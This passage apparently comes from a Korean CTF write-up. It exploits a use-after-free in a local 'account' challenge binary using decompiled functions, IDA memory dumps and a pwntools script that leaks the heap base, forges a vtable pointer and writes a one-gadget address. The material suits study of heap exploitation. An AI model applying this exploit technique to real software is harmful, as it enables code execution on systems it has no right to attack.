                              • free_func((__int64)_account);<\/code><\/strong><\/li>\n<\/ul>\n<\/li>\n\n\n\n
                              • account_id_array[1]<\/code>\uc5d0\ub294 \uc5ec\uc804\ud788 \ub0a8\uc544\uc788\uc74c<\/li>\n<\/ul>\n\n\n\n
                                __int64 __fastcall free_account_id(unsigned __int8 a1)\n{\n  account *_account; \/\/ [rsp+8h] [rbp-18h]\n\n  if ( a1 < 0x10u && (_account = (account *)account_id_array[a1]) != 0 )\n  {\n    if ( !--_account->count )\n    {\n      free_func((__int64)_account->account_data);\n      free_func((__int64)_account);\n    }\n    return _account->count;\n  }\n  else\n  {\n    fprintf(unk_7FFFF7FAD860, \"invalid account id\\n\");\n    return (unsigned __int8)-1;\n  }\n}<\/pre>\n\n\n\n
                                account_array[0]<\/code>\uc740 1\ubc88\uc9f8 \uc778\ub371\uc2a4\uc758 account<\/code>\ub97c \uac00\ub9ac\ud0b4.<\/s> nullptr 0<\/code> \uac00\ub9ac\ud0b4.<\/strong><\/p>\n\n\n\n
                                \"\"<\/figure>\n\n\n\n
                                \"\"<\/figure>\n\n\n\n
                                \"\"<\/figure>\n\n\n\n
                                make_group()<\/code>\uc744 \ud1b5\ud55c \uc7ac\ud560\ub2f9 \uc2dc\ub3c4 (UAF)<\/h3>\n\n\n\n
                                Code: group_index = make_group()<\/code><\/p>\n\n\n\n
                                2\ubc88\uc758 \ud560\ub2f9\uc774 \uc774\ub8e8\uc5b4\uc9d0.<\/p>\n\n\n\n
                                  \n
                                • v0 = alloca((signed __int64)group_array);<\/code><\/strong><\/li>\n\n\n\n
                                • v1 = alloca((signed __int64)group_array)...<\/code><\/strong><\/li>\n<\/ul>\n\n\n\n
                                  Use-after-free \ubc84\uadf8 \ubc1c\uc0dd.<\/p>\n\n\n\n
                                    \n
                                  • account_id_array[1]<\/strong><\/code>\uacfc group_array[1]<\/strong><\/code>\uc740 \uc11c\ub85c \uac19\uc740 \uc8fc\uc18c\ub97c \uac00\ub9ac\ud0b4<\/li>\n\n\n\n
                                  • 0x7FFFF7FFA021<\/code><\/strong><\/li>\n<\/ul>\n\n\n\n
                                    __int64 make_group()\n{\n  void *v0; \/\/ rsp\n  void *v1; \/\/ rsp\n  int i; \/\/ [rsp+10h] [rbp-10h]\n\n  for ( i = 0; ; ++i )\n  {\n    if ( i >= 16 )\n    {\n      fprintf(stderr, \"no more group\\n\");\n      return (unsigned __int8)-1;\n    }\n    if ( !group_array[i] )\n      break;\n  }\n  v0 = alloca((signed __int64)group_array);\n  if ( group_array\n    && (LODWORD(group_array[0]) = 0, v1 = alloca((signed __int64)group_array), (group_array[1] = group_array) != 0) )\n  {\n    memset((void *)group_array[1], 0, 0x80u);\n    group_array[2] = &group_vtable;\n    group_array[i] = group_array;\n    return (unsigned __int8)i;\n  }\n  else\n  {\n    fprintf(stderr, \"failed to allocate memory\\n\");\n    return (unsigned __int8)-1;\n  }\n}<\/pre>\n\n\n\n
                                    \"\"<\/figure>\n\n\n\n
                                    heap base \ub204\ucd9c<\/h3>\n\n\n\n
                                    \uc774\uc81c list_group<\/code> \ud568\uc218 \ucd9c\ub825\uc744 \ud1b5\ud574 heap base \uc8fc\uc18c\ub97c \ub204\ucd9c\uc2dc\ud0ac \uc218 \uc788\ub2e4.<\/p>\n\n\n\n
                                    Code:<\/p>\n\n\n\n
                                    # ...\nadd_account_to_group(group_index, b\"\\x01\")      #(group_id, account_id)\n\nlist_group(b\"\\x01\")     #(group_index)\n\nleaked_heap_base = p.recvuntil(b\"\\x7f\")\np.recv(1)\nleaked_heap_base = u64(leaked_heap_base.ljust(8, b\"\\x00\")) - 0x21\nsuccess(f\"leaked_heap_base: {hex(leaked_heap_base)}\")<\/pre>\n\n\n\n
                                    \"\"<\/figure>\n\n\n\n
                                    \"\"<\/figure>\n\n\n\n
                                    account \ucd94\uac00 \uc0dd\uc131 \ubc0f vtable \uc8fc\uc18c \uc0bd\uc785<\/h3>\n\n\n\n
                                      \n
                                    • \uc0dd\uc131\ub41c account_array[3] \uc8fc\uc18c = 0x0007FFFF7FFA17B<\/code><\/li>\n<\/ul>\n\n\n\n
                                      group_vtable_ptr = leaked_heap_base + 0x31\nmake_account(True, b\"E\"*8 + p64(group_vtable_ptr))<\/pre>\n\n\n\n
                                      \"\"<\/figure>\n\n\n\n
                                      1, 0\ubc88\uca30 \uc778\ub371\uc2a4 account \uc81c\uac70 \ud6c4 account \uc0dd\uc131, \uc778\ub371\uc2a40<\/h3>\n\n\n\n
                                        \n
                                      • G 23\ubc14\uc774\ud2b8<\/strong> \ub370\uc774\ud130\uc640 \ud568\uaed8 account \uc0dd\uc131<\/li>\n\n\n\n
                                      • 0x0007FFFF7FFA000<\/code> \uc8fc\uc18c\uc5d0 \ud560\ub2f9<\/li>\n\n\n\n
                                      • \uc65c 23\ubc14\uc774\ud2b8<\/strong>? XXX \uc548\uadf8\ub7ec\uba74 \ub05d\uc5d0 \uc258\ub538\ub54c add_account_to_group<\/code> \ud568\uc218 \uc218\ud589\uc2dc 'group is full\u2019<\/code> \uc5d0\ub7ec\ub738<\/li>\n\n\n\n
                                      • \uc6d0\ub798\ub294 vtable\uc5d0 \uc6d0\uac00\uc82f \uc8fc\uc18c\uac00 \uc801\ud600\uc788\uc5b4 \uc2e4\ud589\ub418\uc57c\ud558\ub294\ub370? \uc65c?<\/li>\n<\/ul>\n\n\n\n
                                        delete_account(b\"\\x01\")\ndelete_account(b\"\\x00\")\nmake_account(b\"\\x01\", b\"G\"*23)<\/pre>\n\n\n\n
                                        MEMORY:00007FFFF7FFA000 db 1                                    ; is_utf8_type\nMEMORY:00007FFFF7FFA001 db 1                                    ; count\nMEMORY:00007FFFF7FFA002 db 0, 0, 0, 0, 0, 0\nMEMORY:00007FFFF7FFA008 dq offset stru_7FFFF7FFA021             ; account_data\nMEMORY:00007FFFF7FFA010 db    0\nMEMORY:00007FFFF7FFA011 db    0\nMEMORY:00007FFFF7FFA012 db    0\nMEMORY:00007FFFF7FFA013 db    0\nMEMORY:00007FFFF7FFA014 db    0\nMEMORY:00007FFFF7FFA015 db    0\nMEMORY:00007FFFF7FFA016 db    0\nMEMORY:00007FFFF7FFA017 db    0\nMEMORY:00007FFFF7FFA018 db  41h ; A\nMEMORY:00007FFFF7FFA019 db  41h ; A\nMEMORY:00007FFFF7FFA01A db  41h ; A\nMEMORY:00007FFFF7FFA01B db  41h ; A\nMEMORY:00007FFFF7FFA01C db  41h ; A\nMEMORY:00007FFFF7FFA01D db  41h ; A\nMEMORY:00007FFFF7FFA01E db  41h ; A\nMEMORY:00007FFFF7FFA01F db  41h ; A\nMEMORY:00007FFFF7FFA020 db    0\nMEMORY:00007FFFF7FFA021 stru_7FFFF7FFA021 group <47h, <47h, 47h, 47h, 47h, 47h, 47h, 47h>, \\\nMEMORY:00007FFFF7FFA021                                         ; DATA XREF: MEMORY:00007FFFF7FFA000\u2191o\nMEMORY:00007FFFF7FFA021        offset unk_4747474747474747, offset unk_47474747474747>\nMEMORY:00007FFFF7FFA039 db  42h ; B\nMEMORY:00007FFFF7FFA03A db  42h ; B\nMEMORY:00007FFFF7FFA03B db  42h ; B\nMEMORY:00007FFFF7FFA03C db  42h ; B\nMEMORY:00007FFFF7FFA03D db  42h ; B\nMEMORY:00007FFFF7FFA03E db  42h ; B\nMEMORY:00007FFFF7FFA03F db  42h ; B\nMEMORY:00007FFFF7FFA040 db  42h ; B\nMEMORY:00007FFFF7FFA041 db    0<\/pre>\n\n\n\n
                                        \uc81c\uac70 \ud6c4 0\ubc88\uc9f8 account \uc0dd\uc131\uc2dc 23\ubc14\uc774\ud2b8\uc5ec\uc57c<\/strong> vtable\uc5d0 \uc6d0\uac00\uc82f \uc8fc\uc18c\uac00 \uc2e4\ud589\ub418\ub294 \uc774\uc720<\/h3>\n\n\n\n
                                        \uc694\uc57d: 26\ubc14\uc774\ud2b8\uc778 \uc774\uc720\ub294 0x0007FFFF7FFA021<\/code> \uc8fc\uc18c\uac12\uc73c\ub85c \uc7ac\ud560\ub2f9\ubc1b\uae30 \uc704\ud574<\/p>\n\n\n\n
                                        \uc778\ub371\uc2a4 1 account \uacc4\uc815 \uc0dd\uc131\ud588\uc744\ub54c, 0x~21\ubd80\ud130 0x~38\uae4c\uc9c0 account \uad6c\uc870\uccb4\ub97c \uc704\ud574 \ud560\ub2f9\ud568<\/strong> (\uadf8 \ub4a4 \uc8fc\uc18c\ub294 account_data \uac12 \ub4e4\uc5b4\uac10)<\/p>\n\n\n\n
                                        0x38 - 0x21 = 23<\/code><\/strong><\/p>\n\n\n\n
                                        \"\"<\/figure>\n\n\n\n
                                        \uc2dc\ud589 \ucc29\uc624:<\/p>\n\n\n\n
                                        from pwn import *\n# context.log_level = 'debug'\ncontext(arch='amd64', os='linux')\nwarnings.filterwarnings('ignore')\n\np = process(\".\/account\")\ne = ELF('.\/account', checksec=False)\n\ndef make_account(is_utf8_type, data):\n    _menu = b\"\\x00\"\n    if(is_utf8_type):\n        _is_utf8_type = b\"\\x01\"\n    else:\n        _is_utf8_type = b\"\\x00\"\n    _data = data\n    payload = _menu + _is_utf8_type + _data\n\n    p.send(payload)\n    return p.recv(1)\n\ndef delete_account(index):\n    _menu = b\"\\x01\"\n    _index = index\n    payload = _menu + _index\n\n    p.send(payload)\n    return p.recv(1)\n\ndef modify_account_data(is_utf8_type, account_index, data):\n    _menu = b\"\\x02\"\n    if(is_utf8_type):\n        _is_utf8_type = b\"\\x01\"\n    else:\n        _is_utf8_type = b\"\\x00\"\n    payload = _menu + account_index + _is_utf8_type + data\n    \n    p.send(payload)\n    r = p.recv(len(data))\n    info(f\"modify_account_data r: {r}\")\n    return p.recv(timeout=0.5)\n\ndef make_group():\n    _menu = b\"\\x10\"\n    \n    p.send(_menu)\n    return p.recv(1)\n\ndef delete_group(group_index):\n    _menu = b\"\\x11\"\n\n    p.send(_menu + group_index)\n    return p.recv(1)\n\ndef add_account_to_group(group_index, account_index):\n    _menu = b\"\\x12\"\n    \n    p.send(_menu + group_index + account_index)\n    return p.recv(1, timeout=0.5)\n\ndef delete_account_from_group(group_index, account_index):\n    _menu = b\"\\x13\"\n\n    p.send(_menu + group_index + account_index)\n    return p.recv(1)\n\ndef list_group(group_index):\n    p.send(b\"\\x14\" + group_index)\n    # return p.recv()\n\naccount_index = make_account(True, b\"A\"*8)   #0\ninfo(f\"make_account _index: {account_index}\")\n\naccount_index = make_account(True, b\"B\"*8)   #1\ninfo(f\"make_account _index: {account_index}\")\n\naccount_index = make_account(True, b\"C\"*8)   #2\ninfo(f\"make_account _index: {account_index}\")\n\n\nfor i in range(0xff):\n    group_index = make_group()    #0\n    info(f\"group_index _index: {group_index}\")\n    add_account_to_group(group_index, b\"\\x01\")  #(group_id, account_id)\n\n    # pause()\n    modify_account_data(False, b\"\\x02\", b\"D\"*8)\n\n    # delete_account_from_group(b\"\\x00\", b\"\\x01\")  #(group_id, account_id)\n    delete_group(b\"\\x00\")\n\ngroup_index = make_group()    #0\ninfo(f\"group_index _index: {group_index}\")\nadd_account_to_group(group_index, b\"\\x01\")  #(group_id, account_id)\n# \uc5ec\uae30\uae4c\uc9c0 \ud588\uc744\ub54c, 1\ubc88\uca30 \uc778\ub371\uc2a4 account\uc758 count \ud544\ub4dc\uac12\uc740 1\uc774 \ub428.\n\n\n\ndelete_account_from_group(group_index, b\"\\x01\") #(group_id, account_id)\n#Free \ub428.\n\ngroup_index = make_group()                      #1\n#Use \ub428.\n\nadd_account_to_group(group_index, b\"\\x01\")      #(group_id, account_id)\n\nlist_group(b\"\\x01\")     #(group_index)\n\nleaked_heap_base = p.recvuntil(b\"\\x7f\")\np.recv(1)\nleaked_heap_base = u64(leaked_heap_base.ljust(8, b\"\\x00\")) - 0x21\nsuccess(f\"leaked_heap_base: {hex(leaked_heap_base)}\")\n\ngroup_vtable_ptr = leaked_heap_base + 0x31\nmake_account(True, b\"E\"*8 + p64(group_vtable_ptr))\n\ndelete_account(b\"\\x01\")\ndelete_account(b\"\\x00\")\nmake_account(True, b\"G\"*23)  #account_index=0 (is_utf8_type, account_data)\n\n\n\nlibc_base = leaked_heap_base - 0x268000\nog = libc_base + 0xebc81\nmake_account(True, b\"B\"*16+ p64(og))    #account_index=1 (is_utf8_type, account_data)\npause()<\/pre>\n\n\n\n
                                        MEMORY:00007FFFF7FFA000 db 1                                    ; is_utf8_type\nMEMORY:00007FFFF7FFA001 db 1                                    ; count\nMEMORY:00007FFFF7FFA002 db 0, 0, 0, 0, 0, 0\nMEMORY:00007FFFF7FFA008 dq offset stru_7FFFF7FFA021             ; account_data\nMEMORY:00007FFFF7FFA010 db    0\nMEMORY:00007FFFF7FFA011 db    0\nMEMORY:00007FFFF7FFA012 db    0\nMEMORY:00007FFFF7FFA013 db    0\nMEMORY:00007FFFF7FFA014 db    0\nMEMORY:00007FFFF7FFA015 db    0\nMEMORY:00007FFFF7FFA016 db    0\nMEMORY:00007FFFF7FFA017 db    0\nMEMORY:00007FFFF7FFA018 db  41h ; A\nMEMORY:00007FFFF7FFA019 db  41h ; A\nMEMORY:00007FFFF7FFA01A db  41h ; A\nMEMORY:00007FFFF7FFA01B db  41h ; A\nMEMORY:00007FFFF7FFA01C db  41h ; A\nMEMORY:00007FFFF7FFA01D db  41h ; A\nMEMORY:00007FFFF7FFA01E db  41h ; A\nMEMORY:00007FFFF7FFA01F db  41h ; A\nMEMORY:00007FFFF7FFA020 db    0\nMEMORY:00007FFFF7FFA021 stru_7FFFF7FFA021 db 47h                                  ; account_count\nMEMORY:00007FFFF7FFA021                                         ; DATA XREF: MEMORY:00007FFFF7FFA000\u2191o\nMEMORY:00007FFFF7FFA022 db 47h, 47h, 47h, 47h, 47h, 47h, 47h    ; gap0\nMEMORY:00007FFFF7FFA029 dq offset unk_4747474747474747          ; account_array\nMEMORY:00007FFFF7FFA031 dq offset unk_47474747474747            ; _group_vtable\nMEMORY:00007FFFF7FFA039 db  42h ; B\nMEMORY:00007FFFF7FFA03A db  42h ; B\nMEMORY:00007FFFF7FFA03B db  42h ; B\nMEMORY:00007FFFF7FFA03C db  42h ; B\nMEMORY:00007FFFF7FFA03D db  42h ; B\nMEMORY:00007FFFF7FFA03E db  42h ; B\nMEMORY:00007FFFF7FFA03F db  42h ; B\nMEMORY:00007FFFF7FFA040 db  42h ; B\nMEMORY:00007FFFF7FFA041 db    0<\/pre>\n\n\n\n
                                        22\ubc14\uc774\ud2b8 \uc77c\uacbd\uc6b0:<\/strong><\/p>\n\n\n\n
                                        \uc774\uc804 \ud560\ub2f9\ud55c \ud06c\uae30\uc640 \ub2ec\ub77c account \uc0dd\uc131\uc2dc 0x7FFFF7FFA1A2<\/code> \uc8fc\uc18c\ub85c \ud560\ub2f9\ubc1b\uc74c!!!<\/p>\n\n\n\n
                                        0x7FFFF7FFA1A2<\/code> \u2260 0x7FFFF7FFA021<\/code> mismatch.<\/p>\n\n\n\n
                                        0x7FFFF7FFA021<\/code>\uc740 account_array[1]<\/code>, group_array[1]<\/code>\uc758 \uc8fc\uc18c\ub97c \uc758\ubbf8. \uc5f0\uc18d\ub41c G \ubb38\uc790\uc5f4 \uc790\uccb4\uac00 \ub36e\ud788\uc9c0 \uc54a\uc74c. 23\ubc14\uc774\ud2b8\uc600\ub2e4\uba74 \ub36e\ud600\uc57c \ud568.<\/strong><\/p>\n\n\n\n
                                        MEMORY:00007FFFF7FFA000 db 1                                    ; is_utf8_type\nMEMORY:00007FFFF7FFA001 db 1                                    ; count\nMEMORY:00007FFFF7FFA002 db 0, 0, 0, 0, 0, 0\nMEMORY:00007FFFF7FFA008 dq offset off_7FFFF7FFA1A2              ; account_data\nMEMORY:00007FFFF7FFA010 db    0\nMEMORY:00007FFFF7FFA011 db    0\nMEMORY:00007FFFF7FFA012 db    0\nMEMORY:00007FFFF7FFA013 db    0\nMEMORY:00007FFFF7FFA014 db    0\nMEMORY:00007FFFF7FFA015 db    0\nMEMORY:00007FFFF7FFA016 db    0\nMEMORY:00007FFFF7FFA017 db    0\nMEMORY:00007FFFF7FFA018 db  41h ; A\nMEMORY:00007FFFF7FFA019 db  41h ; A\nMEMORY:00007FFFF7FFA01A db  41h ; A\nMEMORY:00007FFFF7FFA01B db  41h ; A\nMEMORY:00007FFFF7FFA01C db  41h ; A\nMEMORY:00007FFFF7FFA01D db  41h ; A\nMEMORY:00007FFFF7FFA01E db  41h ; A\nMEMORY:00007FFFF7FFA01F db  41h ; A\nMEMORY:00007FFFF7FFA020 db    0\nMEMORY:00007FFFF7FFA021 db 1                                    ; account_count\nMEMORY:00007FFFF7FFA022 db 1, 0, 0, 0, 0, 0, 0                  ; gap0\nMEMORY:00007FFFF7FFA029 dq offset off_7FFFF7FFA1B9              ; account_array\nMEMORY:00007FFFF7FFA031 dq offset group_vtable                  ; _group_vtable\nMEMORY:00007FFFF7FFA039 db  42h ; B\nMEMORY:00007FFFF7FFA03A db  42h ; B\nMEMORY:00007FFFF7FFA03B db  42h ; B\nMEMORY:00007FFFF7FFA03C db  42h ; B\nMEMORY:00007FFFF7FFA03D db  42h ; B\nMEMORY:00007FFFF7FFA03E db  42h ; B\nMEMORY:00007FFFF7FFA03F db  42h ; B\nMEMORY:00007FFFF7FFA040 db  42h ; B\nMEMORY:00007FFFF7FFA041 db    0<\/pre>\n\n\n\n
                                        <\/p>\n\n\n\n
                                        \uacc4\uc815 \uc0dd\uc131, \uc778\ub371\uc2a41<\/h3>\n\n\n\n